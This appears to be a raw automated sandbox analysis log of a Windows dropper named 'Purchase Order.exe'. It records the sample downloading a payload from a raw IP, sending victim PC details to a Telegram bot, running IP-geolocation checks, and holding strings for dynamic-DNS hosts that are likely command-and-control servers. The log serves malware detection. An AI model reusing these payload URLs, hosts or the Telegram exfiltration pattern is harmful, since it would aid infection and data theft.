Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2021/10/2024%20/%2017:55:09%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /efxSlCP242.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.129.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 21 Oct 2024 09:30:53 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Purchase Order.exe, 00000004.00000002.3364746506.0000000007E60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://84.38.129.16/efxSlCP242.bin
Source: Purchase Order.exe, 00000004.00000002.3364386866.0000000006354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://84.38.129.16/efxSlCP242.binJ
Source: Purchase Order.exe, 00000004.00000002.3364386866.0000000006354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://84.38.129.16/efxSlCP242.binn
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: Purchase Order.exe, Purchase Order.exe, 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Purchase Order.exe, 00000000.00000000.2111963143.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Purchase Order.exe, 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Purchase Order.exe, 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20a
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Purchase Order.exe, 00000004.00000002.3384062771.000000003692F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.3384062771.0000000036A17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Purchase Order.exe, 00000004.00000002.3384062771.00000000369E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Purchase Order.exe, 00000004.00000002.3384062771.000000003687A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.3384062771.00000000368EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: Purchase Order.exe, 00000004.00000002.3384062771.000000003687A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Purchase Order.exe, 00000004.00000002.3384062771.00000000368EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186
Source: Purchase Order.exe, 00000004.00000002.3384062771.00000000368EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186$
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036A17000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.3384062771.0000000036A08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036A08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/p
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49988 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_0040524E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_0040524E

System Summary
barindex
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Purchase Order.exe
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\Purchase Order.exe Process Stats: CPU usage > 49%
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_004032BF EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004032BF
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_004032BF EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_004032BF
Creates files inside the system directory
Source: C:\Users\user\Desktop\Purchase Order.exe File created: C:\Windows\SysWOW64\lamellate.ini Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_00406542 0_2_00406542
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_00404A8D 0_2_00404A8D
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_00406542 4_2_00406542
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_00404A8D 4_2_00404A8D
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_001181E0 4_2_001181E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_0011D2CA 4_2_0011D2CA
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_00115370 4_2_00115370
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_0011D599 4_2_0011D599
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_0011CA08 4_2_0011CA08
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_0011EC18 4_2_0011EC18
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_00115C38 4_2_00115C38
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_0011CD28 4_2_0011CD28
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_0011AD48 4_2_0011AD48
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_0011CFF7 4_2_0011CFF7
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_0011F4D0 4_2_0011F4D0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_0011F4C6 4_2_0011F4C6
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_001139F0 4_2_001139F0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_001129EC 4_2_001129EC
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_0011CA58 4_2_0011CA58
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_00113AA1 4_2_00113AA1
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_0011EC0A 4_2_0011EC0A
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_00113E09 4_2_00113E09
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39AB10B8 4_2_39AB10B8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39AB47A8 4_2_39AB47A8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39AB9398 4_2_39AB9398
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39AB1798 4_2_39AB1798
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39AB8AA8 4_2_39AB8AA8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39AB1E80 4_2_39AB1E80
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABD580 4_2_39ABD580
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABD9CD 4_2_39ABD9CD
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABD9D8 4_2_39ABD9D8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABD9D7 4_2_39ABD9D7
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABD128 4_2_39ABD128
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABD119 4_2_39ABD119
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABD571 4_2_39ABD571
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39AB10A7 4_2_39AB10A7
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABFC88 4_2_39ABFC88
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABFC98 4_2_39ABFC98
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39AB8CC8 4_2_39AB8CC8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABCCC0 4_2_39ABCCC0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABCCD0 4_2_39ABCCD0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABC420 4_2_39ABC420
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABC40F 4_2_39ABC40F
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39AB0014 4_2_39AB0014
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABC869 4_2_39ABC869
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABC878 4_2_39ABC878
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39AB0040 4_2_39AB0040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABF840 4_2_39ABF840
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39AB1788 4_2_39AB1788
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABEF85 4_2_39ABEF85
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39AB4798 4_2_39AB4798
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABEF90 4_2_39ABEF90
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABF3E8 4_2_39ABF3E8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABEB28 4_2_39ABEB28
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39AB8320 4_2_39AB8320
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABEB38 4_2_39ABEB38
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39AB8310 4_2_39AB8310
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABE288 4_2_39ABE288
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABE6E0 4_2_39ABE6E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABE6D1 4_2_39ABE6D1
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABDE20 4_2_39ABDE20
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABDE30 4_2_39ABDE30
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39ABE278 4_2_39ABE278
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39AB1E72 4_2_39AB1E72
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA8B58 4_2_39CA8B58
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA7D78 4_2_39CA7D78
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA7720 4_2_39CA7720
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA1A50 4_2_39CA1A50
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA41CA 4_2_39CA41CA
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA41C8 4_2_39CA41C8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA5BCF 4_2_39CA5BCF
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA65C0 4_2_39CA65C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAF3C0 4_2_39CAF3C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAD3C1 4_2_39CAD3C1
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA5BD8 4_2_39CA5BD8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAD3D0 4_2_39CAD3D0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAB3D1 4_2_39CAB3D1
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA15E9 4_2_39CA15E9
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAB3E0 4_2_39CAB3E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA15F8 4_2_39CA15F8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA2FF8 4_2_39CA2FF8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAE5FF 4_2_39CAE5FF
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA15F7 4_2_39CA15F7
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA5780 4_2_39CA5780
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAE180 4_2_39CAE180
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAC180 4_2_39CAC180
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAC190 4_2_39CAC190
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA1190 4_2_39CA1190
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA65AF 4_2_39CA65AF
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA11A0 4_2_39CA11A0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA2BA1 4_2_39CA2BA1
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA2BB0 4_2_39CA2BB0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAF3B1 4_2_39CAF3B1
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA0D48 4_2_39CA0D48
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA2748 4_2_39CA2748
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA8B49 4_2_39CA8B49
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CACF40 4_2_39CACF40
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAAF40 4_2_39CAAF40
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA0D47 4_2_39CA0D47
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA2758 4_2_39CA2758
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAAF50 4_2_39CAAF50
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA5773 4_2_39CA5773
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAE170 4_2_39CAE170
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA2300 4_2_39CA2300
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CABD00 4_2_39CABD00
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA531F 4_2_39CA531F
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA7711 4_2_39CA7711
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA5328 4_2_39CA5328
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CACF2F 4_2_39CACF2F
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAEF20 4_2_39CAEF20
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA0D38 4_2_39CA0D38
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAEF30 4_2_39CAEF30
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA72CA 4_2_39CA72CA
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA72C8 4_2_39CA72C8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAAAC0 4_2_39CAAAC0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA4ED0 4_2_39CA4ED0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAA0D0 4_2_39CAA0D0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAA0E0 4_2_39CAA0E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CADCE0 4_2_39CADCE0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CADCF0 4_2_39CADCF0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA08F0 4_2_39CA08F0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CABCF0 4_2_39CABCF0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA22F1 4_2_39CA22F1
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAEA8F 4_2_39CAEA8F
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA0498 4_2_39CA0498
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA1E98 4_2_39CA1E98
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CACA9F 4_2_39CACA9F
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA1EA8 4_2_39CA1EA8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAAAAF 4_2_39CAAAAF
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAEAA0 4_2_39CAEAA0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CACAB0 4_2_39CACAB0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAD84F 4_2_39CAD84F
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA0040 4_2_39CA0040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA1A40 4_2_39CA1A40
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAF840 4_2_39CAF840
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAB85F 4_2_39CAB85F
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAF850 4_2_39CAF850
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAD860 4_2_39CAD860
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA3460 4_2_39CA3460
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA4A78 4_2_39CA4A78
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA6E72 4_2_39CA6E72
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA6E70 4_2_39CA6E70
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAB870 4_2_39CAB870
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA4A74 4_2_39CA4A74
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA3008 4_2_39CA3008
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAC60F 4_2_39CAC60F
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA6A18 4_2_39CA6A18
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA461C 4_2_39CA461C
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAE610 4_2_39CAE610
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA4620 4_2_39CA4620
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CAC620 4_2_39CAC620
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39CA6030 4_2_39CA6030
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D156B8 4_2_39D156B8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D15D58 4_2_39D15D58
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D104D0 4_2_39D104D0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D17ED0 4_2_39D17ED0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1D4D0 4_2_39D1D4D0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D13FD7 4_2_39D13FD7
